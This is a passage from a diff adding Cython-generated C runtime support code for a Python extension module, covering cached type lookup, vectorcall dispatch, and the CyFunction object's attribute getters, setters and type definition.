bad; +#else + basicsize = likely(PyType_Check(cached_type)) ? ((PyTypeObject*) cached_type)->tp_basicsize : -1; +#endif + if (__Pyx_VerifyCachedType( + cached_type, + object_name, + basicsize, + spec->basicsize) < 0) { + goto bad; + } + goto done; + } + if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; + PyErr_Clear(); + CYTHON_UNUSED_VAR(module); + cached_type = __Pyx_PyType_FromModuleAndSpec(abi_module, spec, bases); + if (unlikely(!cached_type)) goto bad; + if (unlikely(__Pyx_fix_up_extension_type_from_spec(spec, (PyTypeObject *) cached_type) < 0)) goto bad; + if (PyObject_SetAttrString(abi_module, object_name, cached_type) < 0) goto bad; +done: + Py_DECREF(abi_module); + assert(cached_type == NULL || PyType_Check(cached_type)); + return (PyTypeObject *) cached_type; +bad: + Py_XDECREF(cached_type); + cached_type = NULL; + goto done; +} +#endif + +/* PyVectorcallFastCallDict */ + #if CYTHON_METH_FASTCALL +static PyObject *__Pyx_PyVectorcall_FastCallDict_kw(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) +{ + PyObject *res = NULL; + PyObject *kwnames; + PyObject **newargs; + PyObject **kwvalues; + Py_ssize_t i, pos; + size_t j; + PyObject *key, *value; + unsigned long keys_are_strings; + Py_ssize_t nkw = PyDict_GET_SIZE(kw); + newargs = (PyObject **)PyMem_Malloc((nargs + (size_t)nkw) * sizeof(args[0])); + if (unlikely(newargs == NULL)) { + PyErr_NoMemory(); + return NULL; + } + for (j = 0; j < nargs; j++) newargs[j] = args[j]; + kwnames = PyTuple_New(nkw); + if (unlikely(kwnames == NULL)) { + PyMem_Free(newargs); + return NULL; + } + kwvalues = newargs + nargs; + pos = i = 0; + keys_are_strings = Py_TPFLAGS_UNICODE_SUBCLASS; + while (PyDict_Next(kw, &pos, &key, &value)) { + keys_are_strings &= Py_TYPE(key)->tp_flags; + Py_INCREF(key); + Py_INCREF(value); + PyTuple_SET_ITEM(kwnames, i, key); + kwvalues[i] = value; + i++; + } + if (unlikely(!keys_are_strings)) { + PyErr_SetString(PyExc_TypeError, "keywords must be strings"); + goto cleanup; + } + res = vc(func, newargs, nargs, kwnames); +cleanup: + Py_DECREF(kwnames); + for (i = 0; i < nkw; i++) + Py_DECREF(kwvalues[i]); + PyMem_Free(newargs); + return res; +} +static CYTHON_INLINE PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) +{ + if (likely(kw == NULL) || PyDict_GET_SIZE(kw) == 0) { + return vc(func, args, nargs, NULL); + } + return __Pyx_PyVectorcall_FastCallDict_kw(func, vc, args, nargs, kw); +} +#endif + +/* CythonFunctionShared */ + static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj) { +#if PY_VERSION_HEX < 0x030900B1 + __Pyx_Py_XDECREF_SET( + __Pyx_CyFunction_GetClassObj(f), + ((classobj) ? __Pyx_NewRef(classobj) : NULL)); +#else + __Pyx_Py_XDECREF_SET( + ((PyCMethodObject *) (f))->mm_class, + (PyTypeObject*)((classobj) ? __Pyx_NewRef(classobj) : NULL)); +#endif +} +static PyObject * +__Pyx_CyFunction_get_doc(__pyx_CyFunctionObject *op, void *closure) +{ + CYTHON_UNUSED_VAR(closure); + if (unlikely(op->func_doc == NULL)) { + if (((PyCFunctionObject*)op)->m_ml->ml_doc) { +#if PY_MAJOR_VERSION >= 3 + op->func_doc = PyUnicode_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); +#else + op->func_doc = PyString_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); +#endif + if (unlikely(op->func_doc == NULL)) + return NULL; + } else { + Py_INCREF(Py_None); + return Py_None; + } + } + Py_INCREF(op->func_doc); + return op->func_doc; +} +static int +__Pyx_CyFunction_set_doc(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (value == NULL) { + value = Py_None; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_doc, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_name(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(op->func_name == NULL)) { +#if PY_MAJOR_VERSION >= 3 + op->func_name = PyUnicode_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); +#else + op->func_name = PyString_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); +#endif + if (unlikely(op->func_name == NULL)) + return NULL; + } + Py_INCREF(op->func_name); + return op->func_name; +} +static int +__Pyx_CyFunction_set_name(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); +#if PY_MAJOR_VERSION >= 3 + if (unlikely(value == NULL || !PyUnicode_Check(value))) +#else + if (unlikely(value == NULL || !PyString_Check(value))) +#endif + { + PyErr_SetString(PyExc_TypeError, + "__name__ must be set to a string object"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_name, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_qualname(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + Py_INCREF(op->func_qualname); + return op->func_qualname; +} +static int +__Pyx_CyFunction_set_qualname(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); +#if PY_MAJOR_VERSION >= 3 + if (unlikely(value == NULL || !PyUnicode_Check(value))) +#else + if (unlikely(value == NULL || !PyString_Check(value))) +#endif + { + PyErr_SetString(PyExc_TypeError, + "__qualname__ must be set to a string object"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_qualname, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_dict(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(op->func_dict == NULL)) { + op->func_dict = PyDict_New(); + if (unlikely(op->func_dict == NULL)) + return NULL; + } + Py_INCREF(op->func_dict); + return op->func_dict; +} +static int +__Pyx_CyFunction_set_dict(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(value == NULL)) { + PyErr_SetString(PyExc_TypeError, + "function's dictionary may not be deleted"); + return -1; + } + if (unlikely(!PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "setting function's dictionary to a non-dict"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_dict, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_globals(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + Py_INCREF(op->func_globals); + return op->func_globals; +} +static PyObject * +__Pyx_CyFunction_get_closure(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(op); + CYTHON_UNUSED_VAR(context); + Py_INCREF(Py_None); + return Py_None; +} +static PyObject * +__Pyx_CyFunction_get_code(__pyx_CyFunctionObject *op, void *context) +{ + PyObject* result = (op->func_code) ? op->func_code : Py_None; + CYTHON_UNUSED_VAR(context); + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_init_defaults(__pyx_CyFunctionObject *op) { + int result = 0; + PyObject *res = op->defaults_getter((PyObject *) op); + if (unlikely(!res)) + return -1; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + op->defaults_tuple = PyTuple_GET_ITEM(res, 0); + Py_INCREF(op->defaults_tuple); + op->defaults_kwdict = PyTuple_GET_ITEM(res, 1); + Py_INCREF(op->defaults_kwdict); + #else + op->defaults_tuple = PySequence_ITEM(res, 0); + if (unlikely(!op->defaults_tuple)) result = -1; + else { + op->defaults_kwdict = PySequence_ITEM(res, 1); + if (unlikely(!op->defaults_kwdict)) result = -1; + } + #endif + Py_DECREF(res); + return result; +} +static int +__Pyx_CyFunction_set_defaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value) { + value = Py_None; + } else if (unlikely(value != Py_None && !PyTuple_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__defaults__ must be set to a tuple object"); + return -1; + } + PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__defaults__ will not " + "currently affect the values used in function calls", 1); + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->defaults_tuple, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_defaults(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->defaults_tuple; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + if (op->defaults_getter) { + if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; + result = op->defaults_tuple; + } else { + result = Py_None; + } + } + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_set_kwdefaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value) { + value = Py_None; + } else if (unlikely(value != Py_None && !PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__kwdefaults__ must be set to a dict object"); + return -1; + } + PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__kwdefaults__ will not " + "currently affect the values used in function calls", 1); + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->defaults_kwdict, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_kwdefaults(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->defaults_kwdict; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + if (op->defaults_getter) { + if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; + result = op->defaults_kwdict; + } else { + result = Py_None; + } + } + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_set_annotations(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value || value == Py_None) { + value = NULL; + } else if (unlikely(!PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__annotations__ must be set to a dict object"); + return -1; + } + Py_XINCREF(value); + __Pyx_Py_XDECREF_SET(op->func_annotations, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_annotations(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->func_annotations; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + result = PyDict_New(); + if (unlikely(!result)) return NULL; + op->func_annotations = result; + } + Py_INCREF(result); + return result; +} +static PyObject * +__Pyx_CyFunction_get_is_coroutine(__pyx_CyFunctionObject *op, void *context) { + int is_coroutine; + CYTHON_UNUSED_VAR(context); + if (op->func_is_coroutine) { + return __Pyx_NewRef(op->func_is_coroutine); + } + is_coroutine = op->flags & __Pyx_CYFUNCTION_COROUTINE; +#if PY_VERSION_HEX >= 0x03050000 + if (is_coroutine) { + PyObject *module, *fromlist, *marker = __pyx_n_s_is_coroutine; + fromlist = PyList_New(1); + if (unlikely(!fromlist)) return NULL; + Py_INCREF(marker); + PyList_SET_ITEM(fromlist, 0, marker); + module = PyImport_ImportModuleLevelObject(__pyx_n_s_asyncio_coroutines, NULL, NULL, fromlist, 0); + Py_DECREF(fromlist); + if (unlikely(!module)) goto ignore; + op->func_is_coroutine = __Pyx_PyObject_GetAttrStr(module, marker); + Py_DECREF(module); + if (likely(op->func_is_coroutine)) { + return __Pyx_NewRef(op->func_is_coroutine); + } +ignore: + PyErr_Clear(); + } +#endif + op->func_is_coroutine = __Pyx_PyBool_FromLong(is_coroutine); + return __Pyx_NewRef(op->func_is_coroutine); +} +static PyGetSetDef __pyx_CyFunction_getsets[] = { + {(char *) "func_doc", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, + {(char *) "__doc__", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, + {(char *) "func_name", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, + {(char *) "__name__", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, + {(char *) "__qualname__", (getter)__Pyx_CyFunction_get_qualname, (setter)__Pyx_CyFunction_set_qualname, 0, 0}, + {(char *) "func_dict", (getter)__Pyx_CyFunction_get_dict, (setter)__Pyx_CyFunction_set_dict, 0, 0}, + {(char *) "__dict__", (getter)__Pyx_CyFunction_get_dict, (setter)__Pyx_CyFunction_set_dict, 0, 0}, + {(char *) "func_globals", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, + {(char *) "__globals__", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, + {(char *) "func_closure", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, + {(char *) "__closure__", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, + {(char *) "func_code", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, + {(char *) "__code__", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, + {(char *) "func_defaults", (getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, + {(char *) "__defaults__", (getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, + {(char *) "__kwdefaults__", (getter)__Pyx_CyFunction_get_kwdefaults, (setter)__Pyx_CyFunction_set_kwdefaults, 0, 0}, + {(char *) "__annotations__", (getter)__Pyx_CyFunction_get_annotations, (setter)__Pyx_CyFunction_set_annotations, 0, 0}, + {(char *) "_is_coroutine", (getter)__Pyx_CyFunction_get_is_coroutine, 0, 0, 0}, + {0, 0, 0, 0, 0} +}; +static PyMemberDef __pyx_CyFunction_members[] = { + {(char *) "__module__", T_OBJECT, offsetof(PyCFunctionObject, m_module), 0, 0}, +#if CYTHON_USE_TYPE_SPECS + {(char *) "__dictoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_dict), READONLY, 0}, +#if CYTHON_METH_FASTCALL +#if CYTHON_BACKPORT_VECTORCALL + {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_vectorcall), READONLY, 0}, +#else + {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(PyCFunctionObject, vectorcall), READONLY, 0}, +#endif +#endif +#if PY_VERSION_HEX < 0x030500A0 + {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_weakreflist), READONLY, 0}, +#else + {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(PyCFunctionObject, m_weakreflist), READONLY, 0}, +#endif +#endif + {0, 0, 0, 0, 0} +}; +static PyObject * +__Pyx_CyFunction_reduce(__pyx_CyFunctionObject *m, PyObject *args) +{ + CYTHON_UNUSED_VAR(args); +#if PY_MAJOR_VERSION >= 3 + Py_INCREF(m->func_qualname); + return m->func_qualname; +#else + return PyString_FromString(((PyCFunctionObject*)m)->m_ml->ml_name); +#endif +} +static PyMethodDef __pyx_CyFunction_methods[] = { + {"__reduce__", (PyCFunction)__Pyx_CyFunction_reduce, METH_VARARGS, 0}, + {0, 0, 0, 0} +}; +#if PY_VERSION_HEX < 0x030500A0 +#define __Pyx_CyFunction_weakreflist(cyfunc) ((cyfunc)->func_weakreflist) +#else +#define __Pyx_CyFunction_weakreflist(cyfunc) (((PyCFunctionObject*)cyfunc)->m_weakreflist) +#endif +static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject *op, PyMethodDef *ml, int flags, PyObject* qualname, + PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { + PyCFunctionObject *cf = (PyCFunctionObject*) op; + if (unlikely(op == NULL)) + return NULL; + op->flags = flags; + __Pyx_CyFunction_weakreflist(op) = NULL; + cf->m_ml = ml; + cf->m_self = (PyObject *) op; + Py_XINCREF(closure); + op->func_closure = closure; + Py_XINCREF(module); + cf->m_module = module; + op->func_dict = NULL; + op->func_name = NULL; + Py_INCREF(qualname); + op->func_qualname = qualname; + op->func_doc = NULL; +#if PY_VERSION_HEX < 0x030900B1 + op->func_classobj = NULL; +#else + ((PyCMethodObject*)op)->mm_class = NULL; +#endif + op->func_globals = globals; + Py_INCREF(op->func_globals); + Py_XINCREF(code); + op->func_code = code; + op->defaults_pyobjects = 0; + op->defaults_size = 0; + op->defaults = NULL; + op->defaults_tuple = NULL; + op->defaults_kwdict = NULL; + op->defaults_getter = NULL; + op->func_annotations = NULL; + op->func_is_coroutine = NULL; +#if CYTHON_METH_FASTCALL + switch (ml->ml_flags & (METH_VARARGS | METH_FASTCALL | METH_NOARGS | METH_O | METH_KEYWORDS | METH_METHOD)) { + case METH_NOARGS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_NOARGS; + break; + case METH_O: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_O; + break; + case METH_METHOD | METH_FASTCALL | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD; + break; + case METH_FASTCALL | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS; + break; + case METH_VARARGS | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = NULL; + break; + default: + PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); + Py_DECREF(op); + return NULL; + } +#endif + return (PyObject *) op; +} +static int +__Pyx_CyFunction_clear(__pyx_CyFunctionObject *m) +{ + Py_CLEAR(m->func_closure); + Py_CLEAR(((PyCFunctionObject*)m)->m_module); + Py_CLEAR(m->func_dict); + Py_CLEAR(m->func_name); + Py_CLEAR(m->func_qualname); + Py_CLEAR(m->func_doc); + Py_CLEAR(m->func_globals); + Py_CLEAR(m->func_code); +#if PY_VERSION_HEX < 0x030900B1 + Py_CLEAR(__Pyx_CyFunction_GetClassObj(m)); +#else + { + PyObject *cls = (PyObject*) ((PyCMethodObject *) (m))->mm_class; + ((PyCMethodObject *) (m))->mm_class = NULL; + Py_XDECREF(cls); + } +#endif + Py_CLEAR(m->defaults_tuple); + Py_CLEAR(m->defaults_kwdict); + Py_CLEAR(m->func_annotations); + Py_CLEAR(m->func_is_coroutine); + if (m->defaults) { + PyObject **pydefaults = __Pyx_CyFunction_Defaults(PyObject *, m); + int i; + for (i = 0; i < m->defaults_pyobjects; i++) + Py_XDECREF(pydefaults[i]); + PyObject_Free(m->defaults); + m->defaults = NULL; + } + return 0; +} +static void __Pyx__CyFunction_dealloc(__pyx_CyFunctionObject *m) +{ + if (__Pyx_CyFunction_weakreflist(m) != NULL) + PyObject_ClearWeakRefs((PyObject *) m); + __Pyx_CyFunction_clear(m); + __Pyx_PyHeapTypeObject_GC_Del(m); +} +static void __Pyx_CyFunction_dealloc(__pyx_CyFunctionObject *m) +{ + PyObject_GC_UnTrack(m); + __Pyx__CyFunction_dealloc(m); +} +static int __Pyx_CyFunction_traverse(__pyx_CyFunctionObject *m, visitproc visit, void *arg) +{ + Py_VISIT(m->func_closure); + Py_VISIT(((PyCFunctionObject*)m)->m_module); + Py_VISIT(m->func_dict); + Py_VISIT(m->func_name); + Py_VISIT(m->func_qualname); + Py_VISIT(m->func_doc); + Py_VISIT(m->func_globals); + Py_VISIT(m->func_code); + Py_VISIT(__Pyx_CyFunction_GetClassObj(m)); + Py_VISIT(m->defaults_tuple); + Py_VISIT(m->defaults_kwdict); + Py_VISIT(m->func_is_coroutine); + if (m->defaults) { + PyObject **pydefaults = __Pyx_CyFunction_Defaults(PyObject *, m); + int i; + for (i = 0; i < m->defaults_pyobjects; i++) + Py_VISIT(pydefaults[i]); + } + return 0; +} +static PyObject* +__Pyx_CyFunction_repr(__pyx_CyFunctionObject *op) +{ +#if PY_MAJOR_VERSION >= 3 + return PyUnicode_FromFormat("", + op->func_qualname, (void *)op); +#else + return PyString_FromFormat("", + PyString_AsString(op->func_qualname), (void *)op); +#endif +} +static PyObject * __Pyx_CyFunction_CallMethod(PyObject *func, PyObject *self, PyObject *arg, PyObject *kw) { + PyCFunctionObject* f = (PyCFunctionObject*)func; + PyCFunction meth = f->m_ml->ml_meth; + Py_ssize_t size; + switch (f->m_ml->ml_flags & (METH_VARARGS | METH_KEYWORDS | METH_NOARGS | METH_O)) { + case METH_VARARGS: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) + return (*meth)(self, arg); + break; + case METH_VARARGS | METH_KEYWORDS: + return (*(PyCFunctionWithKeywords)(void*)meth)(self, arg, kw); + case METH_NOARGS: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) { + size = PyTuple_GET_SIZE(arg); + if (likely(size == 0)) + return (*meth)(self, NULL); + PyErr_Format(PyExc_TypeError, + "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", + f->m_ml->ml_name, size); + return NULL; + } + break; + case METH_O: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) { + size = PyTuple_GET_SIZE(arg); + if (likely(size == 1)) { + PyObject *result, *arg0; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + arg0 = PyTuple_GET_ITEM(arg, 0); + #else + arg0 = PySequence_ITEM(arg, 0); if (unlikely(!arg0)) return NULL; + #endif + result = (*meth)(self, arg0); + #if !(CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS) + Py_DECREF(arg0); + #endif + return result; + } + PyErr_Format(PyExc_TypeError, + "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", + f->m_ml->ml_name, size); + return NULL; + } + break; + default: + PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); + return NULL; + } + PyErr_Format(PyExc_TypeError, "%.200s() takes no keyword arguments", + f->m_ml->ml_name); + return NULL; +} +static CYTHON_INLINE PyObject *__Pyx_CyFunction_Call(PyObject *func, PyObject *arg, PyObject *kw) { + return __Pyx_CyFunction_CallMethod(func, ((PyCFunctionObject*)func)->m_self, arg, kw); +} +static PyObject *__Pyx_CyFunction_CallAsMethod(PyObject *func, PyObject *args, PyObject *kw) { + PyObject *result; + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *) func; +#if CYTHON_METH_FASTCALL + __pyx_vectorcallfunc vc = __Pyx_CyFunction_func_vectorcall(cyfunc); + if (vc) { +#if CYTHON_ASSUME_SAFE_MACROS + return __Pyx_PyVectorcall_FastCallDict(func, vc, &PyTuple_GET_ITEM(args, 0), (size_t)PyTuple_GET_SIZE(args), kw); +#else + (void) &__Pyx_PyVectorcall_FastCallDict; + return PyVectorcall_Call(func, args, kw); +#endif + } +#endif + if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { + Py_ssize_t argc; + PyObject *new_args; + PyObject *self; + argc = PyTuple_GET_SIZE(args); + new_args = PyTuple_GetSlice(args, 1, argc); + if (unlikely(!new_args)) + return NULL; + self = PyTuple_GetItem(args, 0); + if (unlikely(!self)) { + Py_DECREF(new_args); +#if PY_MAJOR_VERSION > 2 + PyErr_Format(PyExc_TypeError, + "unbound method %.200S() needs an argument", + cyfunc->func_qualname); +#else + PyErr_SetString(PyExc_TypeError, + "unbound method needs an argument"); +#endif + return NULL; + } + result = __Pyx_CyFunction_CallMethod(func, self, new_args, kw); + Py_DECREF(new_args); + } else { + result = __Pyx_CyFunction_Call(func, args, kw); + } + return result; +} +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE int __Pyx_CyFunction_Vectorcall_CheckArgs(__pyx_CyFunctionObject *cyfunc, Py_ssize_t nargs, PyObject *kwnames) +{ + int ret = 0; + if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { + if (unlikely(nargs < 1)) { + PyErr_Format(PyExc_TypeError, "%.200s() needs an argument", + ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); + return -1; + } + ret = 1; + } + if (unlikely(kwnames) && unlikely(PyTuple_GET_SIZE(kwnames))) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes no keyword arguments", ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); + return -1; + } + return ret; +} +static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + if (unlikely(nargs != 0)) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", + def->ml_name, nargs); + return NULL; + } + return def->ml_meth(self, NULL); +} +static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + if (unlikely(nargs != 1)) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", + def->ml_name, nargs); + return NULL; + } + return def->ml_meth(self, args[0]); +} +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + return ((_PyCFunctionFastWithKeywords)(void(*)(void))def->ml_meth)(self, args, nargs, kwnames); +} +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; + PyTypeObject *cls = (PyTypeObject *) __Pyx_CyFunction_GetClassObj(cyfunc); +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + return ((__Pyx_PyCMethod)(void(*)(void))def->ml_meth)(self, cls, args, (size_t)nargs, kwnames); +} +#endif +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_CyFunctionType_slots[] = { + {Py_tp_dealloc, (void *)__Pyx_CyFunction_dealloc}, + {Py_tp_repr, (void *)__Pyx_CyFunction_repr}, + {Py_tp_call, (void *)__Pyx_CyFunction_CallAsMethod}, + {Py_tp_traverse, (void *)__Pyx_CyFunction_traverse}, + {Py_tp_clear, (void *)__Pyx_CyFunction_clear}, + {Py_tp_methods, (void *)__pyx_CyFunction_methods}, + {Py_tp_members, (void *)__pyx_CyFunction_members}, + {Py_tp_getset, (void *)__pyx_CyFunction_getsets}, + {Py_tp_descr_get, (void *)__Pyx_PyMethod_New}, + {0, 0}, +}; +static PyType_Spec __pyx_CyFunctionType_spec = { + __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", + sizeof(__pyx_CyFunctionObject), + 0, +#ifdef Py_TPFLAGS_METHOD_DESCRIPTOR + Py_TPFLAGS_METHOD_DESCRIPTOR | +#endif +#if (defined(_Py_TPFLAGS_HAVE_VECTORCALL) && CYTHON_METH_FASTCALL) + _Py_TPFLAGS_HAVE_VECTORCALL | +#endif + Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, + __pyx_CyFunctionType_slots +}; +#else +static PyTypeObject __pyx_CyFunctionType_type = { + PyVarObject_HEAD_INIT(0, 0) + __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", + sizeof(__pyx_CyFunctionObject), + 0, + (destructor) __Pyx_CyFunction_dealloc, +#if !CYTHON_METH_FASTCALL + 0, +#elif CYTHON_BACKPORT_VECTORCALL + (printfunc)offsetof(__pyx_CyFunctionObject, func_vectorcall), +#else + 